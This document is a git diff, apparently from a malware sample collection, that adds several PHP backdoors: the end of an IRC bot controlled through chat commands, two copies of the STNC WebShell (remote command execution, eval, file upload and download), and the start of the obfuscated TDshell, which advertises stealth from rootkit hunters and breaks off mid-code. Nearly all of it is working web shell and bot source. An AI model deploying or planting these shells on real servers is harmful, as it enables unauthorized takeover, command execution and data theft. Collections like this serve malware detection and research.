'NICK '.$nick . CRL); + } else { + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") { + $msg = strstr($data,":`cycle"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`cycle $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`cycle","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :'.$msg . CRL); + fputs($fp, 'JOIN '.$partchan . CRL); + } + elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`part"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`part $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`part","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :'.$msg . CRL); + $remchan = strtolower($partchan); + if (in_array($remchan, $channel)) { + $channels = str_replace("$remchan ","",$channels); + unset($channel); + $channel = explode(" ", $channels); + } + + foreach ($channel as $v) { + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") { + if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; } + $addchan = strtolower($com[4]); + if (!in_array($addchan, $channel)) { + $channel[]=$addchan; + $channels.="$addchan "; + } + foreach ($channel as $v) { + sleep(rand(1,6)); + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") { + $nick = $com[4]; + $identify = $com[5]; + fputs($fp, 'NICK '.$nick . CRL); + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + } + elseif ($com[3]==':`k' && $com[4] && $chan) { + $msg = strstr($data,":`k"); + $msg = str_replace(":`k $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + } + elseif ($com[3]==':`kb' && $com[4] && $chan) { + $msg = strstr($data,":`kb"); + $msg = str_replace(":`kb $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL); + } + elseif ($com[3]==':`ganti') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + if (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`op' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`deop' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`v' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`dv' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`awaymsg"); + $msg = str_replace(":`awaymsg","",$msg); + if (strlen($msg)<3) { + $raway="on"; + fputs($fp,'AWAY : ' . 'AWAY' . CRL); + } else { + $raway="off"; + fputs($fp,'AWAY : ' . $msg . CRL); + } + } + elseif ($com[3]==':`mode' && $com[4] && $chan) { + fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL); + } + elseif ($com[3]==':`nickmode' && $com[4]) { + $nickmode = $com[4]; + fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); + } + elseif ($com[3]==':`chanlist') { + fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL); + } + elseif ($com[3]==':`userlist') { + $userlist=""; + foreach ($auth as $user) { + if ($user["pass"]) { $pass="-pass ok"; } + else { $pass="-no pass"; } + $userlist .= $user["name"].'('.$user["status"].$pass.') '; + } + fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL); + } + elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`quit"); + $msg = str_replace(":`quit","",$msg); + if (strlen($msg)>3) { + $msg = str_replace(" ","_",$msg); + } + $quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart"); + $quitmsg = $quit1[rand(0,count($quit1) - 1)]; + fputs($fp, 'QUIT ' . $quitmsg . CRL); + $keluar = 1; + exit; + } + elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") { + if ($com[4]) { $localhost = $com[4]; } + else { $localhost = 'localhost'; } + $keluar = 0; + fputs($fp, 'QUIT ' . CRL); + } + elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") { + if (!eregi(".dal.net",$com[4])) { + $remotehost = "irc.dal.net"; + } else { $remotehost = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT changging_server' . CRL); + } + elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + $username = $username; + } else { $username = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_ident' . CRL); + } + elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + $realname = "--"; + } else { $realname = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_fullname' . CRL); + } + elseif ($com[3]==':`topic' && $com[4] && $chan) { + $msg = strstr($data,":`topic"); + $msg = str_replace(":`topic ","",$msg); + fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL); + } + elseif ($com[3]==':!help' && !$chan) { + fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL); + } + } else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth To Authorized '. CRL); } + } + } + elseif (!$auth["$dNick"] && !eregi("auth",$iText)) { + if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) { + if (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL); + } + $inv = strstr($dFrom,'@'); + foreach ($auth as $user) { + if ($user["status"]=="user") { + fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL); + } + } + } + } + elseif (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL); + } + } + } + } + } + elseif (substr($data,0,4) == 'PING') { + fputs($fp,'PONG ' . substr($data,5) . CRL); + $smile = $querym[rand(0,count($querym) - 1)]; + $kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + $kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL); + } + } + } + fclose ($fp); +} while ($keluar==0); +} +working($nick); +?> diff --git a/PHP/Backdoor.PHP.Agent.fo b/PHP/Backdoor.PHP.Agent.fo new file mode 100644 index 00000000..97e257b0 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.fo @@ -0,0 +1,37 @@ + + + + + +
+
 ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|
+
+
 +
+ + +

+
+
+ + + + +
+

Rootshell v © 2006 by SR-Crew

+
+
diff --git a/PHP/Backdoor.PHP.Small.u b/PHP/Backdoor.PHP.Small.u new file mode 100644 index 00000000..2c318ae5 --- /dev/null +++ b/PHP/Backdoor.PHP.Small.u @@ -0,0 +1,36 @@ +$v) +{ $_POST[$k] = stripslashes($v); } + +/* +$login='root'; +$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") + +if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) +{ +header("HTTP/1.0 401 Unauthorized"); +header("WWW-Authenticate: Basic"); +die(); +} +*/ + +function fe($s) +{return function_exists($s);} +function cmd($s) +{if(fe("exec")){exec($s,$r);$r=join("\n",$r);} +elseif(fe("shell_exec"))$r=shell_exec($s); +elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} +elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} +elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} +else $r=`$s`;return $r;} +function safe_mode_is_on() +{return ini_get('safe_mode');} +function str100($s) +{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} +function id() +{return str100(cmd("id"));} +function uname() +{return str100(cmd("uname -a"));} + +function edit($size, $name, $val) +{ return ""; } +function button($capt) +{ return ""; } +function hidden($name, $val) +{ return ""; } +function hidden_pwd() +{ global $location; return hidden("pwd",$location);} + +$action_edit = false; + +$printline = ""; + +if(isset($_POST["action"])) $action = $_POST["action"]; +else $action = "cmd"; + +if(isset($_POST["pwd"])) +{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } + +$location = getcwd(); + +if(($action === "download")&&(isset($_POST["fname"]))) +{ + $fname = $_POST["fname"]; + if(file_exists($fname)) + { + $pathinfo = pathinfo($fname); + header("Content-Transfer-Encoding: binary"); + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($fname)); + header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); + readfile($fname); + die(); + } + else + $printline = "\"$fname\" - download failed."; +} + +echo " STNC WebShell v$version + + + + + + + + +
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". + hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
+
". + hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
+
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Stnc.b b/PHP/Backdoor.PHP.Stnc.b new file mode 100644 index 00000000..d622c708 --- /dev/null +++ b/PHP/Backdoor.PHP.Stnc.b @@ -0,0 +1,168 @@ +$v) +{ $_POST[$k] = stripslashes($v); } + +/* +$login='root'; +$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") + +if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) +{ +header("HTTP/1.0 401 Unauthorized"); +header("WWW-Authenticate: Basic"); +die(); +} +*/ + +function fe($s) +{return function_exists($s);} +function cmd($s) +{if(fe("exec")){exec($s,$r);$r=join("\n",$r);} +elseif(fe("shell_exec"))$r=shell_exec($s); +elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} +elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} +elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} +else $r=`$s`;return $r;} +function safe_mode_is_on() +{return ini_get('safe_mode');} +function str100($s) +{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} +function id() +{return str100(cmd("id"));} +function uname() +{return str100(cmd("uname -a"));} + +function edit($size, $name, $val) +{ return ""; } +function button($capt) +{ return ""; } +function hidden($name, $val) +{ return ""; } +function hidden_pwd() +{ global $location; return hidden("pwd",$location);} + +$action_edit = false; + +$printline = ""; + +if(isset($_POST["action"])) $action = $_POST["action"]; +else $action = "cmd"; + +if(isset($_POST["pwd"])) +{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } + +$location = getcwd(); + +if(($action === "download")&&(isset($_POST["fname"]))) +{ + $fname = $_POST["fname"]; + if(file_exists($fname)) + { + $pathinfo = pathinfo($fname); + header("Content-Transfer-Encoding: binary"); + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($fname)); + header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); + readfile($fname); + die(); + } + else + $printline = "\"$fname\" - download failed."; +} + +echo " STNC WebShell v$version + + + + + + + + +
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". + hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
+
". + hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
+
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.TDshell.a b/PHP/Backdoor.PHP.TDshell.a new file mode 100644 index 00000000..0ecc6e24 --- /dev/null +++ b/PHP/Backdoor.PHP.TDshell.a @@ -0,0 +1,1840 @@ +/** + _______ _ _____ __ _ + |__ __| | | __ \ / _| | | + | | | |__ ___| | | | ___| |_ __ _ ___ ___ __| | + | | | '_ \ / _ \ | | |/ _ \ _/ _` |/ __/ _ \/ _` | + | | | | | | __/ |__| | __/ || (_| | (_| __/ (_| | + |_| |_| |_|\___|_____/ \___|_| \__,_|\___\___|\__,_| + + _____ _ _ _______ + / ____| (_) | |__ __| +| (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___ + \___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \ + ____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | | +|_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_| + __/ | + |___/ + __________________________________________________________________ + |------------------------[ TDshell v0.1 ]------------------------| + | [ © 2005 -> 2008 TheDefaced Security Team ] | +/------------------------------------------------------------------\ +\ / + \ ___________________ .__ .__ .__ / + \ \__ ___/\______ \ _____| |__ ____ | | | | / + \ | | | | \ / ___/ | \_/ __ \| | | | / + / | | | ` \\___ \| Y \ ___/| |_| |__ \ + / |____| /_______ /____ >___| /\___ >____/____/ \ + \ \/ \/ \/ \/ / + \____________________________________________________________/ + | | + |------------------------[ CREDITS ]------------------------| + | | + | www.TheDefaced.org | + | * DeadlyData | + | * Debug | + | * Kr3w | + | * Tr3mbl3r | + | * xaNax` | + | * Blood420 | + \ / + |#######################################################| + / \ + | | + |-----------------------[ FEATURES! ]-----------------------| + | | + | TDshell contains a lot of features. Mainly, TDshell was | + | developed to alleviate what other shells left behind. | + | Other shells can brag the ability to do this and that, | + | but in the end what makes a shell, a shell? We think a | + | shell should have stealth. It should be fast to load, use | + | little memory, avoid logging from rootkit hunters, be | + | modern, and simply do exactly what you want it to do. The | + | style must be simple. It should allow for the execution | + | of your commands, the implimentation of every feature | + | necessary with sleek control and seemless ability. Not | + | only does TDshell aim to be the most stealthiest, but the | + | most powerful all-around shell ever created. | + \ / + |#######################################################| + / \ + |------------------------[ HISTORY ]------------------------| + | | + | TDshell was created to impliment the look and feel that a | + | shell should have, the features and speed that a shell | + | should have, and the endless limits of post-development | + | for everyone. | + | | + | The core of TDshell is a strong shell processing system. | + | Yes, TDshell has object oriented elements, whether you | + | like it or not. It is extensive enough to have to include | + | a system as such. The object oriented system within | + | does not include OOP Class Constructs and Features that | + | are not available with PHP 4. This is due to the fact | + | that many new features to OOP in PHP 5 were added, and to | + | limit the version requirements of this shell such | + | features have not been implimented. | + | | + | TDshell will not log any activity using the shell. No | + | information regarding this shell location, queries, or | + | executions of code will be logged to another server. | + \ / + |#######################################################| + / \ + |---------------------[ DOCUMENTATION ]---------------------| + | | + | Please review the documentation of TDshell at TheDefaced | + | TDshell Project Page on http://tdshell.thedefaced.org. | + \ / + |#######################################################| + / \ + /___________________________________________________________\ + +**/ + +if (substr_count(strtolower($_SERVER['HTTP_USER_AGENT']), "bot")) + { + @header("Location: http://thedefaced.org/"); + exit; + }; + +function current_URI() + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = 'http'; + if ($_SERVER["HTTPS"] == "on") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "s"; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "://"; + if ($_SERVER["SERVER_PORT"] != "80") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["SCRIPT_NAME"]; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]; + }; + return $_42a6152a4d7c7d957669c6d70dc5ba87; + }; + + +function natsort2d(&$_6f3f41fdac2563c0cd2246cb5a507861) { + $_8b950f1de0291b3d751c9073c331b045 = $_3abe5e58427863cb52d841b2e474b99d = array(); + foreach ($_6f3f41fdac2563c0cd2246cb5a507861 as $_4377314b1cecdbac9a384c43c42c6b48=>$_d52f547da0e098832b6b81469d36c48b) { + reset($_d52f547da0e098832b6b81469d36c48b); + $_8b950f1de0291b3d751c9073c331b045[$_4377314b1cecdbac9a384c43c42c6b48]=current($_d52f547da0e098832b6b81469d36c48b); + } + natsort($_8b950f1de0291b3d751c9073c331b045); + foreach ($_8b950f1de0291b3d751c9073c331b045 as $_4377314b1cecdbac9a384c43c42c6b48=>$_d52f547da0e098832b6b81469d36c48b) { + $_3abe5e58427863cb52d841b2e474b99d[$_4377314b1cecdbac9a384c43c42c6b48] = $_6f3f41fdac2563c0cd2246cb5a507861[$_4377314b1cecdbac9a384c43c42c6b48]; + } + $_6f3f41fdac2563c0cd2246cb5a507861 = $_3abe5e58427863cb52d841b2e474b99d; +} + +function getmicrotime() + { + $_f1aa244866e1fc41fe62f3b7ccb03607 = split(" ",microtime()); + $_1392ef521657c311e39af249669c5c4c = $_f1aa244866e1fc41fe62f3b7ccb03607[0] + $_f1aa244866e1fc41fe62f3b7ccb03607[1]; + return $_1392ef521657c311e39af249669c5c4c; + }; + +function view_size($_d01b1d6ca02250dd3186b3eb5feeca75) + { + if (!is_numeric($_d01b1d6ca02250dd3186b3eb5feeca75)) {return FALSE;} + else + { + if ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1073741824) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1073741824*100)/100 ." GB";} + elseif ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1048576) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1048576*100)/100 ." MB";} + elseif ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1024) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1024*100)/100 ." KB";} + else {$_d01b1d6ca02250dd3186b3eb5feeca75 = $_d01b1d6ca02250dd3186b3eb5feeca75 . " B";} + return $_d01b1d6ca02250dd3186b3eb5feeca75; + } + }; +if ( !function_exists('htmlspecialchars_decode') ) + { + function htmlspecialchars_decode($_33343500153dd2bfdb71207b3a2efb0b) + { + return strtr($_33343500153dd2bfdb71207b3a2efb0b, array_flip(get_html_translation_table(HTML_SPECIALCHARS))); + }; + }; + +function processdir($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = @explode(DIRECTORY_SEPARATOR, $_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = @array_reverse($_2211b5dc6bb7947adcb0bf14cee6591e); + foreach ($_2211b5dc6bb7947adcb0bf14cee6591e as $_120c29d6a17d23d38cf83c73ee28474a => $_dbb9cf7861c2b08674858b1c5ed255d3) + { + $_4015b8ddbb3792b7cea9b691c444f9bb = @implode(DIRECTORY_SEPARATOR, @array_reverse($_2211b5dc6bb7947adcb0bf14cee6591e)); + $_a9e5405d6581811dbff46e9ca3280bc1[] = $GLOBALS['TDshell']->make_link("list", array("dir" => $_4015b8ddbb3792b7cea9b691c444f9bb . DIRECTORY_SEPARATOR), @htmlspecialchars($_dbb9cf7861c2b08674858b1c5ed255d3) . DIRECTORY_SEPARATOR); + unset($_2211b5dc6bb7947adcb0bf14cee6591e[$_120c29d6a17d23d38cf83c73ee28474a]); + }; + $_a9e5405d6581811dbff46e9ca3280bc1 = @array_reverse($_a9e5405d6581811dbff46e9ca3280bc1); + $_a9e5405d6581811dbff46e9ca3280bc1 = @implode("", $_a9e5405d6581811dbff46e9ca3280bc1); + return $_a9e5405d6581811dbff46e9ca3280bc1; + }; +if (!@function_exists("htmlspecialchars_decode")) { + function htmlspecialchars_decode($_5fa3317a9a640ed74c5f9247474ed574, $_59588925eec423f30d40b21b1ed1668e = ENT_COMPAT) { + return strtr($_5fa3317a9a640ed74c5f9247474ed574, array_flip(get_html_translation_table(HTML_SPECIALCHARS, $_59588925eec423f30d40b21b1ed1668e))); + }; +}; + +function delete_directory($_03bc224b8d2f7aeadafb2048d91c8f5e) { + $_82c6138b62efd9e0b5bd91204b1d854b = @opendir($_03bc224b8d2f7aeadafb2048d91c8f5e); + while(($_3de8e09f12e75d6214bb6e7720875bf2 = @readdir($_82c6138b62efd9e0b5bd91204b1d854b)) !== FALSE) { + if ($_3de8e09f12e75d6214bb6e7720875bf2 != "." && $_3de8e09f12e75d6214bb6e7720875bf2 != "..") { + if (!@is_dir($_03bc224b8d2f7aeadafb2048d91c8f5e."/".$_3de8e09f12e75d6214bb6e7720875bf2)) + @unlink($_03bc224b8d2f7aeadafb2048d91c8f5e."/".$_3de8e09f12e75d6214bb6e7720875bf2); + else + delete_directory($_03bc224b8d2f7aeadafb2048d91c8f5e.'/'.$_3de8e09f12e75d6214bb6e7720875bf2); + } + } + @closedir($_82c6138b62efd9e0b5bd91204b1d854b); + if (@rmdir($_03bc224b8d2f7aeadafb2048d91c8f5e)) + { + return true; + }; + return false; +}; + +function is_disabled($_d24fdc60af9ffefb892a8c20a6f28f0f) { + $_3f595d48284da121e82e9fba50f8ae78=@explode(',',@ini_get('disable_functions')); + return @in_array($_d24fdc60af9ffefb892a8c20a6f28f0f, $_3f595d48284da121e82e9fba50f8ae78); +} + +function custom_exec($_43b464f69048e498f740f7449de30b58) + { + if (!is_disabled("exec")) + { + @exec($_43b464f69048e498f740f7449de30b58, $_c378b53352ff491652530ac000f8d120); + return @implode("\n", $_c378b53352ff491652530ac000f8d120); + } + elseif (!is_disabled("system")) + { + @ob_start(); + @system($_43b464f69048e498f740f7449de30b58); + $_a9e5405d6581811dbff46e9ca3280bc1 = @ob_get_clean(); + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + elseif (!is_disabled("passthru")) + { + @ob_start(); + @passthru($_43b464f69048e498f740f7449de30b58); + $_a9e5405d6581811dbff46e9ca3280bc1 = @ob_get_clean(); + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + else + { + return FALSE; + } + } + +function listDir($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_7924ccf53d944b2d8320d10d54548e29 = array(); + $_ae816068878d4783e70eeef9284475f4 = array(); + $_fd614daccd49afd7833e083628860ad5 = array(); + + $_c14f19c15d50e72a5733c0ad88a035b9 = @opendir($_2211b5dc6bb7947adcb0bf14cee6591e); + while (($_b6525f529051ff28fa112494d8e2d5a3 = @readdir($_c14f19c15d50e72a5733c0ad88a035b9)) !== FALSE) + { + $_d69e2bdf98584fc6cce9c9f9a9eb8b6a[] = $_b6525f529051ff28fa112494d8e2d5a3; + }; + @closedir($_c14f19c15d50e72a5733c0ad88a035b9); + foreach ($_d69e2bdf98584fc6cce9c9f9a9eb8b6a as $_e702a6d41125002051486e5e72b66d74) + { + if ($_e702a6d41125002051486e5e72b66d74 == ".") + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . "." . DIRECTORY_SEPARATOR; + } + elseif ($_e702a6d41125002051486e5e72b66d74 == "..") + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . ".." . DIRECTORY_SEPARATOR; + } + elseif (@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74)) + { + if (@is_link($_e702a6d41125002051486e5e72b66d74)) + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74 . DIRECTORY_SEPARATOR; + } + else + { + $_fd614daccd49afd7833e083628860ad5[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74 . DIRECTORY_SEPARATOR; + }; + } + elseif (@is_file($_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74)) + { + $_7924ccf53d944b2d8320d10d54548e29[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74; + } + else + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74; + }; + }; + foreach ($_7924ccf53d944b2d8320d10d54548e29 as $_4377314b1cecdbac9a384c43c42c6b48 => $_3de8e09f12e75d6214bb6e7720875bf2) + { + $_86cc5dffb9c95119ecd61c5ce2502cbc[@htmlspecialchars(@basename($_3de8e09f12e75d6214bb6e7720875bf2))] = @realpath($_3de8e09f12e75d6214bb6e7720875bf2); + }; + foreach ($_fd614daccd49afd7833e083628860ad5 as $_4377314b1cecdbac9a384c43c42c6b48 => $_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_929bdda99ead5652737dc2edefe9b0c4[@htmlspecialchars(@basename($_2211b5dc6bb7947adcb0bf14cee6591e))] = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + }; + foreach ($_ae816068878d4783e70eeef9284475f4 as $_4377314b1cecdbac9a384c43c42c6b48 => $_74bd500a4b44ea6a823f6199ccdb62a8) + { + $_022d200e9529826ec8ed110a68478d28[@htmlspecialchars(@basename($_74bd500a4b44ea6a823f6199ccdb62a8))] = @realpath($_74bd500a4b44ea6a823f6199ccdb62a8); + }; + @natsort($_86cc5dffb9c95119ecd61c5ce2502cbc); + @natsort($_929bdda99ead5652737dc2edefe9b0c4); + @natsort($_022d200e9529826ec8ed110a68478d28); + return array("FILES" => $_86cc5dffb9c95119ecd61c5ce2502cbc, "DIRS" => $_929bdda99ead5652737dc2edefe9b0c4, "LINKS" => $_022d200e9529826ec8ed110a68478d28); + } + +function recursiveDirectoryResponse($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + if (!@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + return FALSE; + }; + $_c14f19c15d50e72a5733c0ad88a035b9 = @opendir($_2211b5dc6bb7947adcb0bf14cee6591e); + $_35822b5d3e252c2cd76a8cfd0bc9215b = array(); + while (($_b6525f529051ff28fa112494d8e2d5a3 = @readdir($_c14f19c15d50e72a5733c0ad88a035b9)) !== FALSE) + { + if ($_b6525f529051ff28fa112494d8e2d5a3 !== "." && $_b6525f529051ff28fa112494d8e2d5a3 !== "..") + { + if (@is_dir($_b6525f529051ff28fa112494d8e2d5a3) && !isset($_35822b5d3e252c2cd76a8cfd0bc9215b[$_b6525f529051ff28fa112494d8e2d5a3 . DIRECTORY_SEPARATOR])) + { + $_35822b5d3e252c2cd76a8cfd0bc9215b[$_b6525f529051ff28fa112494d8e2d5a3 . DIRECTORY_SEPARATOR] = 